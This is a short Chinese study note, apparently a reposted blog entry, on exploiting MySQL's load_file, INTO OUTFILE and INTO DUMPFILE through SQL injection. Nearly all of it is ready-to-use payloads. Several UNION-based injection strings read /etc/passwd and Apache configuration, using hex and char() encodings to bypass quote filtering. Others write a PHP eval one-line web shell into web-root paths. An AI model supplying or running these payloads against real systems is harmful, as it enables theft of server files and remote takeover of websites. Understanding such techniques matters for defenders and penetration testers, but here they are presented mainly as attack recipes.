标签:
语句简单记忆:
select load_file();
select ‘一句话‘ into outfile ‘网站路径‘ ;
1、Mysql 读与写函数
(1) 读取函数
load_file()
(2) 写入函数
into outfile ‘‘
into dumpfile ‘‘
2、Mysql读函数使用
(1)读配置文件语句
select load_file(‘/etc/httpd/conf/httpd.conf‘)
select load_file(‘/etc/passwd‘)
(2)注入点读配置文件语句
and 1=2 union select 1,load_file(‘/etc/httpd/conf/httpd.conf‘),3,4,5,6 -- -
and 1=2 union select 1,load_file(‘/etc/passwd‘),3,4,5,6 -- -
(3)单引号绕过配置文件读取
and 1=2 union select 1,load_file(‘/etc/passwd‘),3,4,5,6 -- -
and 1=2 union select 1,load_file(0x2F6574632F706173737764),3,4,5,6 -- - 0x2F6574632F706173737764为"/etc/passwd"十六进制hex转换结果;
and 1=2 union select 1,load_file(char(47 101 116 99 47 112 97 115 115 119 100 )),3,4,5,6 -- - char(47 101 116 99 47 112 97 115 115 119 100 )为“、etc/passwd”的ASCII转码;
注:当浏览器返回数据时,有可能乱码问题,此时可以使用hex()函数将字符串转换为“十六进制” 数据,格式如下。
and 1=2 union select 1,hex(load_file(char(47 101 116 99 47 112 97 115 115 119 100))) ,3,4,5,6 -- -
3、Mysql写入函数使用
(1)写入一句话语句
select ‘一句话‘ into outfile ‘/opt/lampp/htdocs/1.php‘
select ‘一句话‘ into dumpfile ‘/var/www/html/1.php‘
(2)注入点写入一句话语句
select ‘<?php @eval($_POST[123]);?>‘ into outfile ‘/opt/lampp/htdocs/1.php‘
select ‘<?php @eval($_POST[123]);?>‘ into dumpfile ‘/var/www/html/1.php‘
Mysql 读与写函数利用学习
标签:
原文地址:http://www.cnblogs.com/my1e3/p/5815404.html
